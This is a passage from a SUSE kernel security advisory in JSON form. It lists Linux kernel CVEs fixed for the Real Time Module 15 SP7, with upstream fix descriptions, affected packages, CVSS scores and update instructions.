"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi: stmm: Fix incorrect buffer allocation method\n\nThe communication buffer allocated by setup_mm_hdr() is later on passed\nto tee_shm_register_kernel_buf(). The latter expects those buffers to be\ncontiguous pages, but setup_mm_hdr() just uses kmalloc(). That can cause\nvarious corruptions or BUGs, specifically since commit 9aec2fb0fd5e\n(\"slab: allocate frozen pages\"), though it was broken before as well.\n\nFix this by using alloc_pages_exact() instead of kmalloc().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39836",
"url": "https://www.suse.com/security/cve/CVE-2025-39836"
},
{
"category": "external",
"summary": "SUSE Bug 1249904 for CVE-2025-39836",
"url": "https://bugzilla.suse.com/1249904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39836"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
